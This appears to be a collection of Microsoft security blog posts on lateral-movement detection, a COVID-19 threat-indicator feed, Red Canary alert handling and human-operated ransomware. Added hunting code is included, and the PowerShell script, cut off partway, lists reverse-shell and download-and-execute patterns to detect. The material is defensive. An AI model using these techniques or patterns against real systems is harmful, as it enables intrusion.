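The benign daily SMB pair and the hop whose destination alerted earlier are both dropped, so the five alerts from Figure 5’s pivot chain land in one incident while the unrelated alerts stay separate.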

Augmenting incidents with lateral movement intel

The PARINACOTA attack we described earlier is a human-operated ransomware campaign that involved compromising six newly onboarded servers. Microsoft Threat Protection automatically correlated the following events into an incident that showed the end-to-end attack chain:

  • A behavioral model identified RDP inbound brute force attempts that started a few days before the ransomware was deployed, as depicted in Figure 6.
  • When the initial compromise was detected, the brute force attempts were automatically identified as the cause of the breach.
  • Following the breach, attackers dropped multiple suspicious files on the compromised server and proceeded to move laterally to multiple other servers and deploy the ransomware payload. This attack chain raised 16 distinct alerts that Microsoft Threat Protection, applying the probabilistic reasoning method, correlated into the same incident indicating the spread of ransomware, as illustrated in Figure 7.

Graph showing increased daily inbound RDP traffic

Figure 6. Indicator of brute force attack based on time series count of daily inbound public IP

Diagram showing ransomware being deployed after an attacker has moved laterally

Figure 7. Representation of post breach and ransomware spreading from initial compromised server

Another area where constructing graphs is particularly useful is when attacks originate from unknown devices. These unknown devices can be misconfigured machines, rogue devices, or even IoT devices within a network. Even when there’s no robust telemetry from devices, they can still be used as linking points for correlating activity across multiple monitored devices.

In one example, as demonstrated in Figure 8, we saw lateral movement from an unmonitored device via SMB to a monitored device. That device then established a connection back to a command-and-control (C2) server, set up persistence, and collected a variety of information from the device. Later, the same unmonitored device established an SMB connection to a second monitored device. This time, the only actions the attacker took were to collect information from the device.

The two devices shared a common set of events that were correlated into the same incident:

  • Sign-in from an unknown device via SMB
  • Collecting device information

Diagram showing suspicious traffic from unknown devices

Figure 8: Correlating attacks from unknown devices

Conclusion

Lateral movement is one of the most challenging areas of attack detection because it can be a very subtle signal amidst the normal hum of a large environment. In this blog we described a data-driven approach for identifying lateral movement in enterprise networks, with the goal of driving incident-level discovery of attacks, delivering on the Microsoft Threat Protection (MTP) promise to provide coordinated defense against attacks. This approach works by:

  • Consolidating signals from Microsoft Threat Protection’s unparalleled visibility into endpoints, identities, data, and applications.
  • Forming automated, compound questions of the data to identify evidence of an attack across the data ecosystem.
  • Building subgraphs of lateral movement across devices by modeling attack behavior probabilistically.

This approach combines industry-leading optics, expertise, and data science, resulting in automated discovery of some of the most critical threats in customer environments today. Through Microsoft Threat Protection, organizations can uncover lateral movement in their networks and gain an understanding of end-to-end attack chains. Microsoft Threat Protection empowers defenders to automatically stop and resolve attacks, so security operations teams can focus their precious time and resources on more critical tasks, including performing mitigation actions that can remove the ability of attackers to move laterally in the first place, as outlined in some of our recent investigations here and here.
Justin Carroll, Cole Sodja, Mike Flowers, Joshua Neil, Jonathan Bar Or, Dustin Duran

Microsoft Threat Protection Team

Open-sourcing new COVID-19 threat intelligence

May 14th, 2020

A global threat requires a global response. While the world faces the common threat of COVID-19, defenders are working overtime to protect users all over the globe from cybercriminals using COVID-19 as a lure to mount attacks. As a security intelligence community, we are stronger when we share information that offers a more complete view of attackers’ shifting techniques. This more complete view enables us all to be more proactive in protecting, detecting, and defending against attacks.

At Microsoft, our security products provide built-in protections against these and other threats, and we’ve published detailed guidance to help organizations combat current threats (Responding to COVID-19 together). Our threat experts are sharing examples of malicious lures and we have enabled guided hunting of COVID-themed threats using Azure Sentinel Notebooks. Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack. Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. Microsoft Threat Protection (MTP) customers are already protected against the threats identified by these indicators across endpoints with Microsoft Defender Advanced Threat Protection (ATP) and email with Office 365 ATP.

In addition, we are publishing these indicators for those not protected by Microsoft Threat Protection to raise awareness of attackers’ shift in techniques, how to spot them, and how to enable your own custom hunting. These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.

This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.

This COVID-specific threat intelligence feed represents a start at sharing some of Microsoft’s COVID-related IOCs. We will continue to explore ways to improve the data over the duration of the crisis. While some threats and actors are still best defended more discreetly, we are committed to greater transparency and to taking community feedback on what types of information are most useful to defenders in protecting against COVID-related threats. This is a time-limited feed. We are maintaining this feed through the peak of the outbreak to help organizations focus on recovery.

Protection in Azure Sentinel and Microsoft Threat Protection

Today’s release includes file hash indicators related to email-based attachments identified as malicious and attempting to trick users with COVID-19 or Coronavirus-themed lures. The guidance below provides instructions on how to access and integrate this feed in your own environment.

For Azure Sentinel customers, these indicators can either be imported directly into Azure Sentinel using a Playbook or accessed directly from queries.

The Azure Sentinel Playbook that Microsoft has authored will continuously monitor and import these indicators directly into your Azure Sentinel ThreatIntelligenceIndicator table. This Playbook will match them with your event data and generate security incidents when the built-in threat intelligence analytic templates detect activity associated with these indicators.

These indicators can also be accessed directly from Azure Sentinel queries as follows:

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"));
covidIndicators

Azure Sentinel logs.

A sample detection query is also provided in the Azure Sentinel GitHub. With the table definition above, it is as simple as:

  1. Join the indicators against the logs ingested into Azure Sentinel as follows (the inner filter uses CommonSecurityLog’s own FileHash column, which is also the join key):

covidIndicators
| join ( CommonSecurityLog | where TimeGenerated >= ago(7d)
| where isnotempty(FileHash)
) on $left.FileHashValue == $right.FileHash

  2. Then, select “New alert rule” to configure Azure Sentinel to raise incidents based on this query returning results.

CyberSecurityDemo in Azure Sentinel logs.

You should begin to see Alerts in Azure Sentinel for any detections related to these COVID threat indicators.

Microsoft Threat Protection provides protection for the threats associated with these indicators. Attacks with these COVID-19-themed indicators are blocked by Office 365 ATP and Microsoft Defender ATP.

While MTP customers are already protected, they can also make use of these indicators for additional hunting scenarios using the MTP Advanced Hunting capabilities.

Here is a hunting query to see if any process created a file matching a hash on the list.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (DeviceFileEvents
| where Timestamp > ago(1d)
| where ActionType == 'FileCreated'
| take 100) on $left.FileHashValue  == $right.SHA256

Advanced hunting in Microsoft Defender Security Center.

This is an Advanced Hunting query in MTP that searches for any recipient of an attachment on the indicator list and sees if any recent anomalous log-ons happened on their machine. While COVID threats are blocked by MTP, users targeted by these threats may be at risk for non-COVID related attacks and MTP is able to join data across device and email to investigate them.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join ( EmailAttachmentInfo
| where Timestamp > ago(1d)
| project NetworkMessageId, SHA256
) on $left.FileHashValue == $right.SHA256
| join (
EmailEvents
| where Timestamp > ago(1d)
) on NetworkMessageId
| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0])
| join (
DeviceLogonEvents
| project LogonTime = Timestamp, AccountName, DeviceName
) on AccountName
| where (LogonTime - TimeEmail) between (0min .. 90min)
| take 10

Advanced hunting in Microsoft 365 security.

Connecting a MISP instance to Azure Sentinel

The indicators published on the Azure Sentinel GitHub page can be consumed directly via MISP’s feed functionality. We have published details on doing this at this URL: https://aka.ms/msft-covid19-misp. Please refer to the Azure Sentinel documentation on connecting data from threat intelligence providers.

Using the indicators if you are not an Azure Sentinel or MTP customer

Yes, the indicators can be used without either product: the Azure Sentinel GitHub is public at https://aka.ms/msft-covid19-Indicators
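For readers without Azure Sentinel or MTP, the feed’s CSV layout (TimeGenerated, FileHashValue, FileHashType) is simple enough to consume with a short script. The block below is an added example, not Microsoft’s tooling: it indexes the feed by hash type, computes only the digest types the feed actually uses for each file under a directory, and reports matches. The feed rows and the “attachment” it finds are constructed stand-ins, not real indicators, and the parser tolerates an optional header row in case the published file carries one.

```python
"""Match the COVID-19 indicator feed against local files without Sentinel or MTP.

Added example, not Microsoft's code. The real feed is the CSV at FEED_URL with
columns TimeGenerated, FileHashValue, FileHashType; SAMPLE_FEED below is a
constructed stand-in whose hashes are derived from a constructed byte string.
"""
import csv
import hashlib
import io
import os
import tempfile

FEED_URL = ("https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/"
            "Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv")
HASHERS = {"md5": hashlib.md5, "sha1": hashlib.sha1, "sha256": hashlib.sha256}

# Constructed stand-in for a malicious attachment, plus feed rows describing it.
SAMPLE_LURE = b"constructed sample: CURE FOR CORONAVIRUS_pdf.gz"
SAMPLE_FEED = "\n".join([
    "TimeGenerated,FileHashValue,FileHashType",   # optional header, skipped
    f"2020-05-14T00:00:00Z,{hashlib.sha256(SAMPLE_LURE).hexdigest()},sha256",
    f"2020-05-14T00:00:00Z,{hashlib.md5(SAMPLE_LURE).hexdigest().upper()},md5",
    "2020-05-14T00:00:00Z," + "0" * 40 + ",sha1",  # constructed, matches nothing
]) + "\n"


def load_indicators(csv_text):
    """Index feed rows as (hash type, lowercase hash) -> TimeGenerated."""
    index = {}
    for row in csv.reader(io.StringIO(csv_text)):
        if len(row) < 3:
            continue
        when, value, htype = row[0].strip(), row[1].strip().lower(), row[2].strip().lower()
        if htype not in HASHERS:
            continue   # header line or an unsupported hash type
        index[(htype, value)] = when
    return index


def file_digests(path, types):
    """Compute only the digest types the feed uses, in one pass over the file."""
    hashers = {t: HASHERS[t]() for t in types}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            for h in hashers.values():
                h.update(chunk)
    return {t: h.hexdigest() for t, h in hashers.items()}


def scan_paths(paths, index):
    """Return [(path, hash type, feed timestamp)] for files matching an indicator."""
    types = {t for t, _ in index}
    hits = []
    for p in paths:
        for t, digest in file_digests(p, types).items():
            if (t, digest) in index:
                hits.append((p, t, index[(t, digest)]))
    return hits


def scan_tree(root, index):
    """Walk a directory tree and scan every regular file in it."""
    paths = [os.path.join(d, f) for d, _, files in os.walk(root) for f in files]
    return scan_paths(paths, index)


def demo_scan():
    """Write the constructed lure and a benign file to a temp dir, then scan it."""
    index = load_indicators(SAMPLE_FEED)
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "attachment.gz"), "wb") as fh:
            fh.write(SAMPLE_LURE)
        with open(os.path.join(tmp, "clean.txt"), "wb") as fh:
            fh.write(b"benign constructed content")
        return scan_tree(tmp, index)


if __name__ == "__main__":
    for path, htype, when in demo_scan():
        print(f"HIT {path} ({htype}, indicator from {when})")
```

To run against the live feed, fetch FEED_URL and pass its text to load_indicators in place of SAMPLE_FEED.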

Examples of phishing campaigns in this threat intelligence

The following is a small sample set of the types of COVID-themed phishing lures using email attachments that will be represented in this feed. Beneath each screenshot are the relevant hashes and metadata.

Figure 1: Spoofing WHO branding with “cure” and “vaccine” messaging with a malicious .gz file.

Name: CURE FOR CORONAVIRUS_pdf.gz

World Health Organization phishing email.

Figure 2: Spoofing Red Cross Safety Tips with malicious .docm file.

Name: COVID-19 SAFETY TIPS.docm

Red Cross phishing email.

Figure 3: South African banking lure promoting COVID-19 financial relief with malicious .html files.

Name: SBSA-COVID-19-Financial Relief.html

Financial relief phishing email.

Figure 4: French language spoofed correspondence from the WHO with malicious XLS Macro file.

Name: ✉-Covid-19 Relief Plan5558-23636sd.htm

Coronavirus-themed phishing email.

If you have questions or feedback on this COVID-19 feed, please email msft-covid19-ti@microsoft.com.


How to gain 24/7 detection and response coverage with Microsoft Defender ATP

May 6th, 2020

This blog post is part of the Microsoft Intelligent Security Association guest blog series. To learn more about MISA, go here.

Whether you’re a security team of one or a dozen, detecting and stopping threats around the clock is a challenge. Security incidents don’t happen exclusively during business hours: attackers often wait until the late hours of the night to breach an environment.

At Red Canary, we work with security teams of all shapes and sizes to improve detection and response capabilities. Our Security Operations Team investigates threats in customer environments 24/7/365, removes false positives, and delivers confirmed threats with context. We’ve seen teams run into a wide range of issues when trying to establish after-hours coverage on their own, including:

  • For global enterprises, around-the-clock monitoring can significantly increase the pressure on a U.S.–based security team. If you have personnel around the world, a security team in a single time zone isn’t sufficient to cover the times that computing assets are used in those environments.
  • In smaller companies that don’t have global operations, the security team is more likely to be understaffed and unable to handle 24/7 security monitoring without stressful on-call schedules.
  • For the security teams of one, being “out of office” is a foreign concept. You’re always on. And you need to set up some way to monitor the enterprise while you’re away.

Microsoft Defender Advanced Threat Protection (ATP) is an industry leading endpoint security solution that’s built into Windows with extended capabilities to Mac and Linux servers. Red Canary unlocks the telemetry delivered from Microsoft Defender ATP and investigates every alert, enabling you to immediately increase your detection coverage and waste no time with false positives.

Here’s how those who haven’t started with Red Canary yet can answer the question, “How can I support my 24/7 security needs with Microsoft Defender ATP?”

No matter how big your security team is, the most important first step is notifying the right people based on an on-call schedule. In this post, we’ll describe two different ways of getting Microsoft Defender ATP alerts to your team 24×7 and how Red Canary has implemented this for our customers.

Basic 24/7 via email

Microsoft Defender Security Center allows you to send all Microsoft Defender ATP alerts to an email address. You can set up email alerts under Settings → Alert notifications.

Email notification settings in Microsoft Defender Security Center.

These emails will be sent to your team and should be monitored for high severity situations after-hours.

If sent to a ticketing system, these emails can trigger tickets or after-hours pages to be created for your security team. We recommend limiting the alerts to medium and high severity so that you won’t be bothered for informational or low alerts.

Setting up alert emails in Microsoft Defender ATP to be sent to a ticketing system.

Now any future alerts will create a new ticket in your ticketing system, where you can assign security team members to on-call rotations and notify on-call personnel of new alerts (if supported). Once the notification is received by on-call personnel, they would then log into Microsoft Defender Security Center for further investigation and triage.

Enhanced 24/7 via APIs

What if you want to ingest alerts to a system that doesn’t use email? You can do this by using the Microsoft Defender ATP APIs. First, you’ll need to have an authentication token. You can get the token like we do here:

API call to retrieve authentication token.

Once you’ve stored the authentication token you can use it to poll the Microsoft Defender ATP API and retrieve alerts from Microsoft Defender ATP. Here’s an example of the code to pull new alerts.

API call to retrieve alerts from Microsoft Defender ATP.

The API only returns a subset of the data associated with each alert. Here’s an example of what you might receive.

Example of a Microsoft Defender ATP alert returned from the API.

You can then take this data and ingest it into any of your internal tools. You can learn more about how to access Microsoft Defender ATP APIs in the documentation. Please note, the limited information included in an alert email or API response is not enough to triage the behavior. You will still need to log into the Microsoft Defender Security Center to find out what happened and take appropriate action.
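The token and alert calls described above, as an added Python example that is not Red Canary’s or Microsoft’s code: it requests a client-credentials token for the Defender ATP API resource, polls the alerts endpoint from a creation-time watermark, keeps only medium and high severity alerts (the threshold recommended earlier for after-hours paging), and de-duplicates on alert id so re-reading the watermark boundary does not page twice. TENANT_ID, APP_ID and APP_SECRET are placeholders for an app registration with the Alert.Read.All application permission, and SAMPLE_RESPONSE is a constructed stand-in for the API’s reply.

```python
"""Poll Microsoft Defender ATP alerts from a watermark and pick the ones to page on.

Added example, not Red Canary's or Microsoft's code. TENANT_ID, APP_ID and
APP_SECRET are placeholders; SAMPLE_RESPONSE is constructed in the shape of
the Alert resource the API returns (id, title, severity, alertCreationTime,
machineId, category) and is used for offline testing of the selection logic.
"""
import json
import urllib.parse
import urllib.request

TENANT_ID = "<tenant-id>"      # placeholder
APP_ID = "<app-id>"            # placeholder
APP_SECRET = "<app-secret>"    # placeholder: load from a secret store in practice

AUTH_URL = f"https://login.microsoftonline.com/{TENANT_ID}/oauth2/token"
API_BASE = "https://api.securitycenter.microsoft.com"
SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}

SAMPLE_RESPONSE = {  # constructed
    "value": [
        {"id": "da1", "title": "Suspicious PowerShell command line", "severity": "High",
         "alertCreationTime": "2020-05-01T02:14:07Z", "machineId": "m-1", "category": "Execution"},
        {"id": "da2", "title": "Network scan observed", "severity": "Informational",
         "alertCreationTime": "2020-05-01T02:20:00Z", "machineId": "m-2", "category": "Discovery"},
        {"id": "da3", "title": "Credential dumping attempt", "severity": "Medium",
         "alertCreationTime": "2020-05-01T02:33:41Z", "machineId": "m-1", "category": "CredentialAccess"},
    ]
}


def token_request_body(app_id=APP_ID, app_secret=APP_SECRET):
    """Form body for the client-credentials grant against the Defender ATP resource."""
    return urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": app_id,
        "client_secret": app_secret,
        "resource": API_BASE,
    }).encode()


def get_token():
    """Exchange the app credentials for a bearer token (network call)."""
    req = urllib.request.Request(AUTH_URL, data=token_request_body())
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)["access_token"]


def alerts_url(since_iso):
    """OData filter for alerts created at or after the watermark. 'ge' rather than
    'gt' so alerts sharing the watermark timestamp are not lost; the seen-id set
    in poll_once removes the resulting re-reads."""
    flt = f"alertCreationTime ge {since_iso}"
    return f"{API_BASE}/api/alerts?$filter={urllib.parse.quote(flt)}"


def http_fetch(url, token):
    """GET a JSON resource with the bearer token (network call)."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def select_alerts(payload, seen_ids, min_severity="Medium"):
    """Keep unseen alerts at or above min_severity; also return the newest timestamp."""
    picked, watermark = [], None
    for a in payload.get("value", []):
        created = a["alertCreationTime"]
        if watermark is None or created > watermark:   # ISO-8601 UTC strings sort lexically
            watermark = created
        if a["id"] in seen_ids:
            continue
        if SEVERITY_RANK.get(a.get("severity"), 0) < SEVERITY_RANK[min_severity]:
            continue
        picked.append({"id": a["id"], "title": a["title"], "severity": a["severity"],
                       "machineId": a.get("machineId"), "created": created})
    return picked, watermark


def poll_once(fetch, token, state, min_severity="Medium"):
    """One poll; state = {"since": iso, "seen": set()} is advanced in place."""
    payload = fetch(alerts_url(state["since"]), token)
    picked, watermark = select_alerts(payload, state["seen"], min_severity)
    state["seen"].update(a["id"] for a in payload.get("value", []))
    if watermark:
        state["since"] = watermark
    return picked


if __name__ == "__main__":
    state = {"since": "2020-05-01T00:00:00Z", "seen": set()}
    for alert in poll_once(http_fetch, get_token(), state):
        print(f"PAGE {alert['severity']}: {alert['title']} on {alert['machineId']}")
```

As the post notes, the fields returned here are enough to route a page but not to triage; the on-call engineer still opens the alert in Microsoft Defender Security Center.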

24/7 with Red Canary

By enabling Red Canary, you supercharge your Microsoft Defender ATP deployment by adding a proven 24×7 security operations team who are masters at finding and stopping threats, and an automation platform to quickly remediate and get back to business.

Red Canary continuously ingests all of the raw telemetry generated from your instance of Microsoft Defender ATP as the foundation for our service. We also ingest and monitor Microsoft Defender ATP alerts. We then apply thousands of our own proprietary analytics to identify potential threats that are sent 24/7 to a Red Canary detection engineer for review.

Here’s an overview of the process (to go behind the scenes of these operations check out our detection engineering blog series):

Managed detection and response with Red Canary.

Red Canary is monitoring your Microsoft Defender ATP telemetry and alerts. If anything is a confirmed threat, our team creates a detection and sends it to you using a built-in automation framework that supports email, SMS, phone, Microsoft Teams/Slack, and more. Below is an example of what one of those detections might look like.

Red Canary confirms threats and prioritizes them so you know what to focus on.

At the top of the detection timeline you’ll receive a short description of what happened. The threat has already been examined by a team of detection engineers from Red Canary’s Cyber Incident Response Team (CIRT), so you don’t have to worry about triage or investigation. As you scroll down, you can quickly see the results of the investigation that Red Canary’s senior detection engineers have done on your behalf, including detailed notes that provide context to what’s happening in your environment:

Notes from Red Canary senior detection engineers (in light blue) provide valuable context.

You’re only notified of true threats and not false positives. This means you can focus on responding rather than digging through data to figure out what happened.

What if you don’t want to be woken up, you’re truly unavailable, or you just want bad stuff immediately dealt with? Use Red Canary’s automation to handle remediation on the fly. You and your team can create playbooks in your Red Canary portal to respond to threats immediately, even if you’re unavailable.

Red Canary automation playbook.

This playbook allows you to isolate the endpoint (using the Machine Action resource type in the Microsoft Defender ATP APIs) if Red Canary identifies suspicious activity. You also have the option to set up Automate playbooks that depend on an hourly schedule. For example, you may want to approve endpoint isolation during normal work hours, but use automatic isolation overnight:

Red Canary Automate playbook to automatically remediate a detection.

Getting started with Red Canary

Whether you’ve been using Microsoft Defender ATP since its preview releases or you’re just getting started, Red Canary is the fastest way to accelerate your security operations program. Immediate onboarding, increased detection coverage, and a 24/7 CIRT team are all at your fingertips.

Terence Jackson, CISO at Thycotic and Microsoft Defender ATP user, describes what it’s like working with Red Canary:

“I have a small team that has to protect a pretty large footprint. I know the importance of detecting, preventing, and stopping problems at the entry point, which is typically the endpoint. We have our corporate users but then we also have SaaS customers we have to protect. Currently my team tackles both, so for me it’s simply having a trusted partner that can take the day-to-day hunting/triage/elimination of false positives and only provide actionable alerts/intel, which frees my team up to do other critical stuff.”

Red Canary is the fastest way to enhance your detection coverage from Microsoft Defender ATP so you know exactly when and where to respond.

Contact us to see a demo and learn more.


Ransomware groups continue to target healthcare, critical services; here’s how to reduce risk

April 28th, 2020

At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.

Multiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.

The ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of human-operated ransomware campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.

Many of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker’s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.

In this blog, we share our in-depth analysis of these ransomware campaigns, including additional technical details, hunting guidance, and recommended prioritization for security operations (SecOps).

Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks

While the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.

In stark contrast to attacks that deliver ransomware via email—which tend to unfold much faster, with ransomware deployed within an hour of initial entry—the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.

To gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:

  • Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)
  • Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords
  • Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers
  • Citrix Application Delivery Controller (ADC) systems affected by CVE-2019-19781
  • Pulse Secure VPN systems affected by CVE-2019-11510

Applying security patches for internet-facing systems is critical in preventing these attacks. It’s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: CVE-2019-0604, CVE-2020-0688, CVE-2020-10189.

As in many breaches, attackers employed credential theft, lateral movement using common tools such as Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after the ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not yet advertised or sold it.

As with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it’s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.

A motley crew of ransomware payloads

While individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.

diagram showing different attack stages and techniques in each stage that various ransomware groups use

RobbinHood ransomware

RobbinHood ransomware operators gained some attention for exploiting vulnerable drivers late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.

Vatet loader

Attackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them, waiting for security organizations to start considering the associated artifacts inactive so that they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.

The group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They were among the most prolific ransomware operators during this period and were responsible for dozens of cases.

Using Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit CVE-2019-19781, brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.

NetWalker ransomware

NetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec and eventually deploy the same NetWalker ransomware.

PonyFinal ransomware

This Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren’t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.

Maze ransomware

One of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.

Maze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.

In a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.

After gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.
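The persistence described above can be hunted for on a single host. The following PowerShell script is an added example and is not part of the original post: it enumerates scheduled tasks and services whose action launches PowerShell with encoded, download-and-execute, or socket-based arguments, and reports the WinRM service state and its listeners. The argument patterns and the output layout are this example's assumptions, not indicators published by Microsoft.

```powershell
# Added hunting example (not from the Microsoft post). Enumerates the two persistence
# locations the Maze write-up names, scheduled tasks and services, for actions that start
# PowerShell with remote-shell style arguments, and reports whether WinRM is listening.
# Run elevated on a suspect host. The pattern list is an assumption: extend it with your
# own observations from the incident.

$suspiciousArgs = @(
    '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}',       # -EncodedCommand followed by a long base64 blob
    'IEX|Invoke-Expression',
    'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b',
    'Net\.Sockets\.TCPClient|GetStream\(\)',              # classic PowerShell reverse shell
    '-w(indowstyle)?\s+hidden',
    'FromBase64String'
)
$pattern = $suspiciousArgs -join '|'

$findings = [System.Collections.Generic.List[object]]::new()

# 1. Scheduled tasks: inspect every action's executable and arguments.
foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        # COM-handler actions have no Execute/Arguments; they format to a blank string and never match.
        $cmd = '{0} {1}' -f $action.Execute, $action.Arguments
        if ($cmd -match 'powershell|pwsh' -and $cmd -match $pattern) {
            $findings.Add([pscustomobject]@{
                Type    = 'ScheduledTask'
                Name    = '{0}{1}' -f $task.TaskPath, $task.TaskName
                RunsAs  = $task.Principal.UserId
                Command = $cmd.Trim()
            })
        }
    }
}

# 2. Services: a service whose ImagePath runs PowerShell at all is rarely legitimate,
#    so flag it whether or not the arguments match the pattern list.
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if ($svc.PathName -match 'powershell|pwsh') {
        $findings.Add([pscustomobject]@{
            Type    = if ($svc.PathName -match $pattern) { 'Service (remote-shell args)' } else { 'Service' }
            Name    = $svc.Name
            RunsAs  = $svc.StartName
            Command = $svc.PathName
        })
    }
}

# 3. WinRM: the post notes attackers turned it on for persistent control. Report its state
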